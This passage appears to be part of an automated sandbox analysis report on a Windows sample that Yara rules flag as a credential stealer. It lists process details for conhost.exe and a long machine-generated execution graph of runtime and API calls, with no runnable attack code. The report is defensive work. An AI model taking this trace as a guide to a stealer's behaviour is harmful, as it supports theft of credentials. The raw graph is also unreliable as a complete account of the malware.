                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:16:51:05
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7fcd70000
                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:21%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:1.4%
                                                                                                                                                                                            Signature Coverage:11.1%
                                                                                                                                                                                            Total number of Nodes:1441
                                                                                                                                                                                            Total number of Limit Nodes:21
                                                                                                                                                                                            execution_graph 5538 406100 5539 40610c type_info::_Type_info_dtor 5538->5539 5573 4082b3 HeapCreate 5539->5573 5542 406169 5575 408126 GetModuleHandleW 5542->5575 5546 40617a __RTC_Initialize 5609 407a76 5546->5609 5547 4060d7 _fast_error_exit 66 API calls 5547->5546 5549 406189 5550 406195 GetCommandLineA 5549->5550 5769 406fc0 5549->5769 5624 40793f 5550->5624 5557 4061ba 5660 40760c 5557->5660 5558 406fc0 __amsg_exit 66 API calls 5558->5557 5561 4061cb 5675 40707f 5561->5675 5563 406fc0 __amsg_exit 66 API calls 5563->5561 5564 4061d3 5565 4061de 5564->5565 5566 406fc0 __amsg_exit 66 API calls 5564->5566 5681 403620 5565->5681 5566->5565 5569 40620d 5776 40725c 5569->5776 5572 406212 type_info::_Type_info_dtor 5574 40615d 5573->5574 5574->5542 5761 4060d7 5574->5761 5576 408141 5575->5576 5577 40813a 5575->5577 5579 4082a9 5576->5579 5580 40814b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5576->5580 5779 406f90 5577->5779 5840 407e40 5579->5840 5582 408194 TlsAlloc 5580->5582 5585 40616f 5582->5585 5586 4081e2 TlsSetValue 5582->5586 5585->5546 5585->5547 5586->5585 5587 4081f3 5586->5587 5783 40727a 5587->5783 5592 407d16 __encode_pointer 6 API calls 5593 408213 5592->5593 5594 407d16 __encode_pointer 6 API calls 5593->5594 5595 408223 5594->5595 5596 407d16 __encode_pointer 6 API calls 5595->5596 5597 408233 5596->5597 5801 40a10e 5597->5801 5604 407d91 __decode_pointer 6 API calls 5605 408287 5604->5605 5605->5579 5606 40828e 5605->5606 5822 407e7d 5606->5822 5608 408296 GetCurrentThreadId 5608->5585 6172 4082e4 5609->6172 5611 407a82 GetStartupInfoA 5612 40aa5c __calloc_crt 66 API calls 5611->5612 5618 407aa3 5612->5618 5613 407cc1 type_info::_Type_info_dtor 5613->5549 5614 407c3e GetStdHandle 5619 407c08 5614->5619 5615 407ca3 SetHandleCount 5615->5613 5616 40aa5c __calloc_crt 66 API calls 5616->5618 5617 407c50 GetFileType 5617->5619 5618->5613 5618->5616 5618->5619 5621 407b8b 5618->5621 5619->5613 5619->5614 5619->5615 5619->5617 5622 40a64c __mtinitlocknum InitializeCriticalSectionAndSpinCount 5619->5622 5620 407bb4 GetFileType 5620->5621 5621->5613 5621->5619 5621->5620 5623 40a64c __mtinitlocknum InitializeCriticalSectionAndSpinCount 5621->5623 5622->5619 5623->5621 5625 40795d GetEnvironmentStringsW 5624->5625 5629 40797c 5624->5629 5626 407971 GetLastError 5625->5626 5627 407965 5625->5627 5626->5629 5630 4079a7 WideCharToMultiByte 5627->5630 5631 407998 GetEnvironmentStringsW 5627->5631 5628 407a15 5632 407a1e GetEnvironmentStrings 5628->5632 5633 4061a5 5628->5633 5629->5627 5629->5628 5636 407a0a FreeEnvironmentStringsW 5630->5636 5637 4079db 5630->5637 5631->5630 5631->5633 5632->5633 5634 407a2e 5632->5634 5649 407884 5633->5649 5639 40aa17 __malloc_crt 66 API calls 5634->5639 5636->5633 5638 40aa17 __malloc_crt 66 API calls 5637->5638 5641 4079e1 5638->5641 5640 407a48 5639->5640 5642 407a5b ___crtGetEnvironmentStringsA 5640->5642 5643 407a4f FreeEnvironmentStringsA 5640->5643 5641->5636 5644 4079e9 WideCharToMultiByte 5641->5644 5647 407a65 FreeEnvironmentStringsA 5642->5647 5643->5633 5645 407a03 5644->5645 5646 4079fb 5644->5646 5645->5636 5648 40a989 type_info::_Type_info_dtor 66 API calls 5646->5648 5647->5633 5648->5645 5650 407899 5649->5650 5651 40789e GetModuleFileNameA 5649->5651 6179 409032 5650->6179 5653 4078c5 5651->5653 6173 4076ea 5653->6173 5655 4061af 5655->5557 5655->5558 5657 40aa17 __malloc_crt 66 API calls 5658 407907 5657->5658 5658->5655 5659 4076ea _parse_cmdline 76 API calls 5658->5659 5659->5655 5661 407615 5660->5661 5664 40761a _strlen 5660->5664 5662 409032 ___initmbctable 110 API calls 5661->5662 5662->5664 5663 4061c0 5663->5561 5663->5563 5664->5663 5665 40aa5c __calloc_crt 66 API calls 5664->5665 5668 40764f _strlen 5665->5668 5666 4076ad 5667 40a989 type_info::_Type_info_dtor 66 API calls 5666->5667 5667->5663 5668->5663 5668->5666 5669 40aa5c __calloc_crt 66 API calls 5668->5669 5670 4076d3 5668->5670 5671 409beb _strcpy_s 66 API calls 5668->5671 5673 407694 5668->5673 5669->5668 5672 40a989 type_info::_Type_info_dtor 66 API calls 5670->5672 5671->5668 5672->5663 5673->5668 5674 409384 __invoke_watson 10 API calls 5673->5674 5674->5673 5676 40708d __IsNonwritableInCurrentImage 5675->5676 6590 406e8d 5676->6590 5678 4070ab __initterm_e 5680 4070ca __IsNonwritableInCurrentImage __initterm 5678->5680 6594 408783 5678->6594 5680->5564 5682 4036b1 5681->5682 6694 403180 FreeConsole 5682->6694 5685 403739 5685->5569 5758 407230 5685->5758 5686 4037b1 5689 4037f7 5686->5689 6702 4034c0 FindNextPrinterChangeNotification 5686->6702 5687 40379c 5688 405ed5 FindClosePrinterChangeNotification 5687->5688 5718 4037ac 5687->5718 6728 4035b0 ScheduleJob 5688->6728 5691 403875 GetVersion 5689->5691 5689->5718 5693 4038d3 5691->5693 5697 4038df 5691->5697 5693->5697 6707 403570 FindFirstPrinterChangeNotification 5693->6707 5694 405f90 2 API calls 5694->5685 5696 4039cf AreFileApisANSI 5696->5697 5697->5696 5698 403ad8 5697->5698 5701 403f72 5698->5701 6708 403570 FindFirstPrinterChangeNotification 5698->6708 5699 40402a 5706 4040e2 5699->5706 6711 405fe0 FindNextPrinterChangeNotification 5699->6711 5701->5699 6710 4035b0 ScheduleJob 5701->6710 5702 403fbc FindFirstPrinterChangeNotification 6709 403570 FindFirstPrinterChangeNotification 5702->6709 5707 404309 QueryPerformanceFrequency 5706->5707 5707->5707 5708 4046e0 5707->5708 5709 4048fd 5708->5709 6714 403570 FindFirstPrinterChangeNotification 5708->6714 5711 404974 5709->5711 6715 403570 FindFirstPrinterChangeNotification 5709->6715 5713 4049c0 WritePrinter 5711->5713 5717 4049fd 5711->5717 5714 405fe0 2 API calls 5713->5714 5714->5717 5715 405e32 5716 4034c0 2 API calls 5715->5716 5716->5718 5717->5715 5719 404c53 5717->5719 6716 403520 FindClosePrinterChangeNotification 5717->6716 5718->5694 5721 404c9c GetProcessHeap 5719->5721 5722 404c9e 5719->5722 5726 404cf2 5721->5726 5727 405d3c 5721->5727 6718 4035e0 FindNextPrinterChangeNotification 5722->6718 5725 404caf 5731 405f90 2 API calls 5725->5731 5728 404cfe 5726->5728 5733 404f00 FindClosePrinterChangeNotification 5726->5733 5734 404e4c 5726->5734 6726 403440 WritePrinter 5727->6726 5730 405d72 FindClosePrinterChangeNotification 5728->5730 6727 403480 FindNextPrinterChangeNotification 5730->6727 5731->5715 5736 405fe0 2 API calls 5733->5736 5735 404e55 5734->5735 6719 403480 FindNextPrinterChangeNotification 5734->6719 5737 404f2c CreateEventW 5735->5737 5736->5737 5740 404fcf 5737->5740 5739 405096 5742 4050d5 GetLogicalDrives 5739->5742 5740->5728 5740->5739 6720 4035e0 FindNextPrinterChangeNotification 5740->6720 5743 405228 CreateFileW 5742->5743 5744 405289 5743->5744 5745 4052d7 5743->5745 5744->5745 5746 405319 CreateFileW 5744->5746 5745->5728 5747 4053b5 5746->5747 5750 4053aa GetCurrentProcess 5746->5750 5747->5750 6721 403440 WritePrinter 5747->6721 5751 405525 CreateMutexW 5750->5751 5757 405ab6 5750->5757 5753 405618 5751->5753 5751->5757 5754 405646 CreateFileW IsProcessorFeaturePresent 5753->5754 5755 405a2d 5753->5755 5754->5753 5755->5757 6722 403440 WritePrinter 5755->6722 6723 405f90 FindFirstPrinterChangeNotification 5757->6723 6782 407104 5758->6782 5760 407241 5760->5569 5762 4060e5 5761->5762 5763 4060ea 5761->5763 5764 407473 __FF_MSGBANNER 66 API calls 5762->5764 5765 4072c8 __NMSG_WRITE 66 API calls 5763->5765 5764->5763 5766 4060f2 5765->5766 5767 407014 _fast_error_exit 2 API calls 5766->5767 5768 4060fc 5767->5768 5768->5542 5770 407473 __FF_MSGBANNER 66 API calls 5769->5770 5771 406fca 5770->5771 5772 4072c8 __NMSG_WRITE 66 API calls 5771->5772 5773 406fd2 5772->5773 5774 407d91 __decode_pointer 6 API calls 5773->5774 5775 406194 5774->5775 5775->5550 5777 407104 _doexit 66 API calls 5776->5777 5778 407267 5777->5778 5778->5572 5780 406f9b Sleep GetModuleHandleW 5779->5780 5781 406fb9 5780->5781 5782 406fbd 5780->5782 5781->5780 5781->5782 5782->5576 5851 407d88 5783->5851 5785 407282 __init_pointers __initp_misc_winsig 5854 40a0fd 5785->5854 5788 407d16 __encode_pointer 6 API calls 5789 4072be 5788->5789 5790 407d16 TlsGetValue 5789->5790 5791 407d2e 5790->5791 5792 407d4f GetModuleHandleW 5790->5792 5791->5792 5793 407d38 TlsGetValue 5791->5793 5794 407d65 5792->5794 5795 407d5f 5792->5795 5798 407d43 5793->5798 5797 407d47 5794->5797 5799 407d82 5794->5799 5796 406f90 __crt_waiting_on_module_handle 2 API calls 5795->5796 5796->5794 5797->5799 5800 407d7a RtlEncodePointer 5797->5800 5798->5792 5798->5797 5799->5592 5800->5799 5802 40a119 5801->5802 5804 408240 5802->5804 5857 40a64c 5802->5857 5804->5579 5805 407d91 TlsGetValue 5804->5805 5806 407da9 5805->5806 5807 407dca GetModuleHandleW 5805->5807 5806->5807 5808 407db3 TlsGetValue 5806->5808 5809 407dda 5807->5809 5812 407de0 5807->5812 5811 407dbe 5808->5811 5810 406f90 __crt_waiting_on_module_handle 2 API calls 5809->5810 5810->5812 5811->5807 5813 407dc2 5811->5813 5812->5813 5814 407dfd 5812->5814 5813->5814 5815 407df5 RtlDecodePointer 5813->5815 5814->5579 5816 40aa5c 5814->5816 5815->5814 5818 40aa65 5816->5818 5819 40826d 5818->5819 5820 40aa83 Sleep 5818->5820 5862 40ea95 5818->5862 5819->5579 5819->5604 5821 40aa98 5820->5821 5821->5818 5821->5819 6151 4082e4 5822->6151 5824 407e89 GetModuleHandleW 5825 407e9f 5824->5825 5826 407e99 5824->5826 5828 407eb7 GetProcAddress GetProcAddress 5825->5828 5829 407edb 5825->5829 5827 406f90 __crt_waiting_on_module_handle 2 API calls 5826->5827 5827->5825 5828->5829 5830 40a28a __lock 62 API calls 5829->5830 5831 407efa InterlockedIncrement 5830->5831 6152 407f52 5831->6152 5834 40a28a __lock 62 API calls 5835 407f1b 5834->5835 6155 409199 InterlockedIncrement 5835->6155 5837 407f39 6167 407f5b 5837->6167 5839 407f46 type_info::_Type_info_dtor 5839->5608 5841 407e56 5840->5841 5842 407e4a 5840->5842 5844 407e6a TlsFree 5841->5844 5845 407e78 5841->5845 5843 407d91 __decode_pointer 6 API calls 5842->5843 5843->5841 5844->5845 5846 40a18d 5845->5846 5847 40a175 DeleteCriticalSection 5845->5847 5849 40a19f DeleteCriticalSection 5846->5849 5850 40a1ad 5846->5850 5848 40a989 type_info::_Type_info_dtor 66 API calls 5847->5848 5848->5845 5849->5846 5850->5585 5852 407d16 __encode_pointer 6 API calls 5851->5852 5853 407d8f 5852->5853 5853->5785 5855 407d16 __encode_pointer 6 API calls 5854->5855 5856 4072b4 5855->5856 5856->5788 5861 4082e4 5857->5861 5859 40a658 InitializeCriticalSectionAndSpinCount 5860 40a69c type_info::_Type_info_dtor 5859->5860 5860->5802 5861->5859 5863 40eaa1 type_info::_Type_info_dtor 5862->5863 5864 40eab9 5863->5864 5872 40ead8 _memset 5863->5872 5875 409c95 5864->5875 5868 40eb4a RtlAllocateHeap 5868->5872 5871 40eace type_info::_Type_info_dtor 5871->5818 5872->5868 5872->5871 5881 40a28a 5872->5881 5888 40b6b4 5872->5888 5894 40eb91 5872->5894 5897 4088c2 5872->5897 5900 407f64 GetLastError 5875->5900 5877 409c9a 5878 4094ac 5877->5878 5879 407d91 __decode_pointer 6 API calls 5878->5879 5880 4094bc __invoke_watson 5879->5880 5882 40a2b2 EnterCriticalSection 5881->5882 5883 40a29f 5881->5883 5882->5872 5947 40a1c7 5883->5947 5885 40a2a5 5885->5882 5886 406fc0 __amsg_exit 65 API calls 5885->5886 5887 40a2b1 5886->5887 5887->5882 5890 40b6e2 5888->5890 5889 40b784 5889->5872 5890->5889 5893 40b77b 5890->5893 6139 40b21b 5890->6139 5893->5889 6146 40b2cb 5893->6146 6150 40a1b0 LeaveCriticalSection 5894->6150 5896 40eb98 5896->5872 5898 407d91 __decode_pointer 6 API calls 5897->5898 5899 4088d2 5898->5899 5899->5872 5914 407e0c TlsGetValue 5900->5914 5903 407fd1 SetLastError 5903->5877 5904 40aa5c __calloc_crt 63 API calls 5905 407f8f 5904->5905 5905->5903 5906 407d91 __decode_pointer 6 API calls 5905->5906 5907 407fa9 5906->5907 5908 407fb0 5907->5908 5909 407fc8 5907->5909 5910 407e7d __getptd_noexit 63 API calls 5908->5910 5919 40a989 5909->5919 5912 407fb8 GetCurrentThreadId 5910->5912 5912->5903 5913 407fce 5913->5903 5915 407e21 5914->5915 5916 407e3c 5914->5916 5917 407d91 __decode_pointer 6 API calls 5915->5917 5916->5903 5916->5904 5918 407e2c TlsSetValue 5917->5918 5918->5916 5921 40a995 type_info::_Type_info_dtor 5919->5921 5920 40aa0e type_info::_Type_info_dtor _realloc 5920->5913 5921->5920 5923 40a28a __lock 64 API calls 5921->5923 5931 40a9d4 5921->5931 5922 40a9e9 HeapFree 5922->5920 5924 40a9fb 5922->5924 5928 40a9ac ___sbh_find_block 5923->5928 5925 409c95 _strcat_s 64 API calls 5924->5925 5926 40aa00 GetLastError 5925->5926 5926->5920 5927 40a9c6 5939 40a9df 5927->5939 5928->5927 5932 40af05 5928->5932 5931->5920 5931->5922 5933 40af44 5932->5933 5938 40b1e6 5932->5938 5934 40b130 VirtualFree 5933->5934 5933->5938 5935 40b194 5934->5935 5936 40b1a3 VirtualFree HeapFree 5935->5936 5935->5938 5942 4097f0 5936->5942 5938->5927 5946 40a1b0 LeaveCriticalSection 5939->5946 5941 40a9e6 5941->5931 5943 409808 5942->5943 5944 40982f __VEC_memcpy 5943->5944 5945 409837 5943->5945 5944->5945 5945->5938 5946->5941 5948 40a1d3 type_info::_Type_info_dtor 5947->5948 5949 40a1f9 5948->5949 5973 407473 5948->5973 5957 40a209 type_info::_Type_info_dtor 5949->5957 6019 40aa17 5949->6019 5955 40a22a 5960 40a28a __lock 66 API calls 5955->5960 5956 40a21b 5959 409c95 _strcat_s 66 API calls 5956->5959 5957->5885 5959->5957 5962 40a231 5960->5962 5963 40a265 5962->5963 5964 40a239 5962->5964 5965 40a989 type_info::_Type_info_dtor 66 API calls 5963->5965 5966 40a64c __mtinitlocknum InitializeCriticalSectionAndSpinCount 5964->5966 5967 40a256 5965->5967 5968 40a244 5966->5968 6025 40a281 5967->6025 5968->5967 5970 40a989 type_info::_Type_info_dtor 66 API calls 5968->5970 5971 40a250 5970->5971 5972 409c95 _strcat_s 66 API calls 5971->5972 5972->5967 6028 40a93e 5973->6028 5976 4072c8 __NMSG_WRITE 66 API calls 5978 40749f 5976->5978 5977 40a93e __set_error_mode 66 API calls 5979 407487 5977->5979 5980 4072c8 __NMSG_WRITE 66 API calls 5978->5980 5979->5976 5981 4074a9 5979->5981 5980->5981 5982 4072c8 5981->5982 5983 4072dc 5982->5983 5984 40a93e __set_error_mode 63 API calls 5983->5984 6015 407437 5983->6015 5985 4072fe 5984->5985 5986 40743c GetStdHandle 5985->5986 5988 40a93e __set_error_mode 63 API calls 5985->5988 5987 40744a _strlen 5986->5987 5986->6015 5991 407463 WriteFile 5987->5991 5987->6015 5989 40730f 5988->5989 5989->5986 5990 407321 5989->5990 5990->6015 6034 409beb 5990->6034 5991->6015 5994 407357 GetModuleFileNameA 5996 407375 5994->5996 6000 407398 _strlen 5994->6000 5998 409beb _strcpy_s 63 API calls 5996->5998 5999 407385 5998->5999 5999->6000 6001 409384 __invoke_watson 10 API calls 5999->6001 6012 4073db 6000->6012 6050 40a889 6000->6050 6001->6000 6005 40a815 _strcat_s 63 API calls 6009 407413 6005->6009 6007 409384 __invoke_watson 10 API calls 6008 4073ff 6007->6008 6008->6005 6011 407424 6009->6011 6013 409384 __invoke_watson 10 API calls 6009->6013 6010 409384 __invoke_watson 10 API calls 6010->6012 6068 40a6ac 6011->6068 6059 40a815 6012->6059 6013->6011 6016 407014 6015->6016 6106 406fe9 GetModuleHandleW 6016->6106 6022 40aa20 6019->6022 6021 40a214 6021->5955 6021->5956 6022->6021 6023 40aa37 Sleep 6022->6023 6108 4087e9 6022->6108 6024 40aa4c 6023->6024 6024->6021 6024->6022 6138 40a1b0 LeaveCriticalSection 6025->6138 6027 40a288 6027->5957 6029 40a94d 6028->6029 6030 40747a 6029->6030 6031 409c95 _strcat_s 66 API calls 6029->6031 6030->5977 6030->5979 6032 40a970 6031->6032 6033 4094ac _strcat_s 6 API calls 6032->6033 6033->6030 6035 409bfc 6034->6035 6037 409c03 6034->6037 6035->6037 6041 409c29 6035->6041 6036 409c95 _strcat_s 66 API calls 6038 409c08 6036->6038 6037->6036 6039 4094ac _strcat_s 6 API calls 6038->6039 6040 407343 6039->6040 6040->5994 6043 409384 6040->6043 6041->6040 6042 409c95 _strcat_s 66 API calls 6041->6042 6042->6038 6095 409fb0 6043->6095 6045 4093b1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6046 409481 __invoke_watson 6045->6046 6047 40948d GetCurrentProcess TerminateProcess 6045->6047 6046->6047 6097 409eb4 6047->6097 6049 407354 6049->5994 6055 40a89b 6050->6055 6051 40a89f 6052 4073c8 6051->6052 6053 409c95 _strcat_s 66 API calls 6051->6053 6052->6010 6052->6012 6054 40a8bb 6053->6054 6056 4094ac _strcat_s 6 API calls 6054->6056 6055->6051 6055->6052 6057 40a8e5 6055->6057 6056->6052 6057->6052 6058 409c95 _strcat_s 66 API calls 6057->6058 6058->6054 6060 40a826 6059->6060 6061 40a82d 6059->6061 6060->6061 6065 40a861 6060->6065 6062 409c95 _strcat_s 66 API calls 6061->6062 6067 40a832 6062->6067 6063 4094ac _strcat_s 6 API calls 6064 4073ee 6063->6064 6064->6007 6064->6008 6065->6064 6066 409c95 _strcat_s 66 API calls 6065->6066 6066->6067 6067->6063 6069 407d88 __init_pointers 6 API calls 6068->6069 6070 40a6bc 6069->6070 6071 40a6cf LoadLibraryA 6070->6071 6075 40a757 6070->6075 6073 40a6e4 GetProcAddress 6071->6073 6074 40a7f9 6071->6074 6072 40a781 6078 407d91 __decode_pointer 6 API calls 6072->6078 6092 40a7ac 6072->6092 6073->6074 6076 40a6fa 6073->6076 6074->6015 6075->6072 6079 407d91 __decode_pointer 6 API calls 6075->6079 6080 407d16 __encode_pointer 6 API calls 6076->6080 6077 407d91 __decode_pointer 6 API calls 6077->6074 6082 40a7c4 6078->6082 6083 40a774 6079->6083 6081 40a700 GetProcAddress 6080->6081 6084 407d16 __encode_pointer 6 API calls 6081->6084 6090 407d91 __decode_pointer 6 API calls 6082->6090 6082->6092 6085 407d91 __decode_pointer 6 API calls 6083->6085 6086 40a715 GetProcAddress 6084->6086 6085->6072 6087 407d16 __encode_pointer 6 API calls 6086->6087 6088 40a72a GetProcAddress 6087->6088 6089 407d16 __encode_pointer 6 API calls 6088->6089 6091 40a73f 6089->6091 6090->6092 6091->6075 6093 40a749 GetProcAddress 6091->6093 6092->6077 6094 407d16 __encode_pointer 6 API calls 6093->6094 6094->6075 6096 409fbc __VEC_memzero 6095->6096 6096->6045 6098 409ebc 6097->6098 6099 409ebe IsDebuggerPresent 6097->6099 6098->6049 6105 40c590 6099->6105 6102 40e422 SetUnhandledExceptionFilter UnhandledExceptionFilter 6103 40e447 GetCurrentProcess TerminateProcess 6102->6103 6104 40e43f __invoke_watson 6102->6104 6103->6049 6104->6103 6105->6102 6107 406ffd ExitProcess 6106->6107 6109 40889c 6108->6109 6119 4087fb 6108->6119 6110 4088c2 _malloc 6 API calls 6109->6110 6111 4088a2 6110->6111 6112 409c95 _strcat_s 65 API calls 6111->6112 6125 408894 6112->6125 6113 407473 __FF_MSGBANNER 65 API calls 6116 40880c 6113->6116 6115 4072c8 __NMSG_WRITE 65 API calls 6115->6116 6116->6113 6116->6115 6118 407014 _fast_error_exit 2 API calls 6116->6118 6116->6119 6117 408858 RtlAllocateHeap 6117->6119 6118->6116 6119->6116 6119->6117 6120 408888 6119->6120 6121 4088c2 _malloc 6 API calls 6119->6121 6123 40888d 6119->6123 6119->6125 6126 40879a 6119->6126 6122 409c95 _strcat_s 65 API calls 6120->6122 6121->6119 6122->6123 6124 409c95 _strcat_s 65 API calls 6123->6124 6124->6125 6125->6022 6127 4087a6 type_info::_Type_info_dtor 6126->6127 6128 4087d7 type_info::_Type_info_dtor 6127->6128 6129 40a28a __lock 66 API calls 6127->6129 6128->6119 6130 4087bc 6129->6130 6131 40b6b4 ___sbh_alloc_block 5 API calls 6130->6131 6132 4087c7 6131->6132 6134 4087e0 6132->6134 6137 40a1b0 LeaveCriticalSection 6134->6137 6136 4087e7 6136->6128 6137->6136 6138->6027 6140 40b262 HeapAlloc 6139->6140 6141 40b22e HeapReAlloc 6139->6141 6142 40b285 VirtualAlloc 6140->6142 6143 40b24c 6140->6143 6141->6143 6144 40b250 6141->6144 6142->6143 6145 40b29f HeapFree 6142->6145 6143->5893 6144->6140 6145->6143 6147 40b2e2 VirtualAlloc 6146->6147 6149 40b329 6147->6149 6149->5889 6150->5896 6151->5824 6170 40a1b0 LeaveCriticalSection 6152->6170 6154 407f14 6154->5834 6156 4091b7 InterlockedIncrement 6155->6156 6157 4091ba 6155->6157 6156->6157 6158 4091c4 InterlockedIncrement 6157->6158 6159 4091c7 6157->6159 6158->6159 6160 4091d1 InterlockedIncrement 6159->6160 6161 4091d4 6159->6161 6160->6161 6162 4091de InterlockedIncrement 6161->6162 6163 4091e1 6161->6163 6162->6163 6164 4091fa InterlockedIncrement 6163->6164 6165 40920a InterlockedIncrement 6163->6165 6166 409215 InterlockedIncrement 6163->6166 6164->6163 6165->6163 6166->5837 6171 40a1b0 LeaveCriticalSection 6167->6171 6169 407f62 6169->5839 6170->6154 6171->6169 6172->5611 6175 407709 6173->6175 6177 407776 6175->6177 6183 40ab49 6175->6183 6176 407874 6176->5655 6176->5657 6177->6176 6178 40ab49 76 API calls _parse_cmdline 6177->6178 6178->6177 6180 40903b 6179->6180 6181 409042 6179->6181 6405 408e98 6180->6405 6181->5651 6186 40aaf6 6183->6186 6189 40632b 6186->6189 6190 40633e 6189->6190 6194 40638b 6189->6194 6197 407fdd 6190->6197 6193 40636b 6193->6194 6217 408b93 6193->6217 6194->6175 6198 407f64 __getptd_noexit 66 API calls 6197->6198 6199 407fe5 6198->6199 6200 406343 6199->6200 6201 406fc0 __amsg_exit 66 API calls 6199->6201 6200->6193 6202 4092ff 6200->6202 6201->6200 6203 40930b type_info::_Type_info_dtor 6202->6203 6204 407fdd __getptd 66 API calls 6203->6204 6205 409310 6204->6205 6206 40933e 6205->6206 6208 409322 6205->6208 6207 40a28a __lock 66 API calls 6206->6207 6209 409345 6207->6209 6210 407fdd __getptd 66 API calls 6208->6210 6233 4092c1 6209->6233 6212 409327 6210->6212 6215 409335 type_info::_Type_info_dtor 6212->6215 6216 406fc0 __amsg_exit 66 API calls 6212->6216 6215->6193 6216->6215 6218 408b9f type_info::_Type_info_dtor 6217->6218 6219 407fdd __getptd 66 API calls 6218->6219 6220 408ba4 6219->6220 6221 40a28a __lock 66 API calls 6220->6221 6222 408bb6 6220->6222 6223 408bd4 6221->6223 6225 408bc4 type_info::_Type_info_dtor 6222->6225 6229 406fc0 __amsg_exit 66 API calls 6222->6229 6224 408c1d 6223->6224 6226 408c05 InterlockedIncrement 6223->6226 6227 408beb InterlockedDecrement 6223->6227 6401 408c2e 6224->6401 6225->6194 6226->6224 6227->6226 6230 408bf6 6227->6230 6229->6225 6230->6226 6231 40a989 type_info::_Type_info_dtor 66 API calls 6230->6231 6232 408c04 6231->6232 6232->6226 6234 4092c5 6233->6234 6235 4092f7 6233->6235 6234->6235 6236 409199 ___addlocaleref 8 API calls 6234->6236 6241 409369 6235->6241 6237 4092d8 6236->6237 6237->6235 6244 409228 6237->6244 6400 40a1b0 LeaveCriticalSection 6241->6400 6243 409370 6243->6212 6245 409239 InterlockedDecrement 6244->6245 6246 4092bc 6244->6246 6247 409251 6245->6247 6248 40924e InterlockedDecrement 6245->6248 6246->6235 6258 409050 6246->6258 6249 40925b InterlockedDecrement 6247->6249 6250 40925e 6247->6250 6248->6247 6249->6250 6251 409268 InterlockedDecrement 6250->6251 6252 40926b 6250->6252 6251->6252 6253 409275 InterlockedDecrement 6252->6253 6255 409278 6252->6255 6253->6255 6254 409291 InterlockedDecrement 6254->6255 6255->6254 6256 4092a1 InterlockedDecrement 6255->6256 6257 4092ac InterlockedDecrement 6255->6257 6256->6255 6257->6246 6259 4090d4 6258->6259 6261 409067 6258->6261 6260 409121 6259->6260 6262 40a989 type_info::_Type_info_dtor 66 API calls 6259->6262 6279 409148 6260->6279 6312 40c291 6260->6312 6261->6259 6268 40a989 type_info::_Type_info_dtor 66 API calls 6261->6268 6270 40909b 6261->6270 6264 4090f5 6262->6264 6266 40a989 type_info::_Type_info_dtor 66 API calls 6264->6266 6271 409108 6266->6271 6267 40a989 type_info::_Type_info_dtor 66 API calls 6267->6279 6274 409090 6268->6274 6269 40918d 6275 40a989 type_info::_Type_info_dtor 66 API calls 6269->6275 6276 40a989 type_info::_Type_info_dtor 66 API calls 6270->6276 6287 4090bc 6270->6287 6277 40a989 type_info::_Type_info_dtor 66 API calls 6271->6277 6272 40a989 type_info::_Type_info_dtor 66 API calls 6273 4090c9 6272->6273 6280 40a989 type_info::_Type_info_dtor 66 API calls 6273->6280 6288 40c46b 6274->6288 6282 409193 6275->6282 6283 4090b1 6276->6283 6284 409116 6277->6284 6278 40a989 66 API calls type_info::_Type_info_dtor 6278->6279 6279->6269 6279->6278 6280->6259 6282->6235 6304 40c426 6283->6304 6286 40a989 type_info::_Type_info_dtor 66 API calls 6284->6286 6286->6260 6287->6272 6289 40c478 6288->6289 6303 40c4f5 6288->6303 6290 40c489 6289->6290 6291 40a989 type_info::_Type_info_dtor 66 API calls 6289->6291 6292 40c49b 6290->6292 6293 40a989 type_info::_Type_info_dtor 66 API calls 6290->6293 6291->6290 6294 40a989 type_info::_Type_info_dtor 66 API calls 6292->6294 6297 40c4ad 6292->6297 6293->6292 6294->6297 6295 40a989 type_info::_Type_info_dtor 66 API calls 6296 40c4bf 6295->6296 6298 40a989 type_info::_Type_info_dtor 66 API calls 6296->6298 6300 40c4d1 6296->6300 6297->6295 6297->6296 6298->6300 6299 40c4e3 6302 40a989 type_info::_Type_info_dtor 66 API calls 6299->6302 6299->6303 6300->6299 6301 40a989 type_info::_Type_info_dtor 66 API calls 6300->6301 6301->6299 6302->6303 6303->6270 6305 40c433 6304->6305 6311 40c467 6304->6311 6306 40a989 type_info::_Type_info_dtor 66 API calls 6305->6306 6307 40c443 6305->6307 6306->6307 6308 40a989 type_info::_Type_info_dtor 66 API calls 6307->6308 6309 40c455 6307->6309 6308->6309 6310 40a989 type_info::_Type_info_dtor 66 API calls 6309->6310 6309->6311 6310->6311 6311->6287 6313 40c2a2 6312->6313 6314 409141 6312->6314 6315 40a989 type_info::_Type_info_dtor 66 API calls 6313->6315 6314->6267 6316 40c2aa 6315->6316 6317 40a989 type_info::_Type_info_dtor 66 API calls 6316->6317 6318 40c2b2 6317->6318 6319 40a989 type_info::_Type_info_dtor 66 API calls 6318->6319 6320 40c2ba 6319->6320 6321 40a989 type_info::_Type_info_dtor 66 API calls 6320->6321 6322 40c2c2 6321->6322 6323 40a989 type_info::_Type_info_dtor 66 API calls 6322->6323 6324 40c2ca 6323->6324 6325 40a989 type_info::_Type_info_dtor 66 API calls 6324->6325 6326 40c2d2 6325->6326 6327 40a989 type_info::_Type_info_dtor 66 API calls 6326->6327 6328 40c2d9 6327->6328 6329 40a989 type_info::_Type_info_dtor 66 API calls 6328->6329 6330 40c2e1 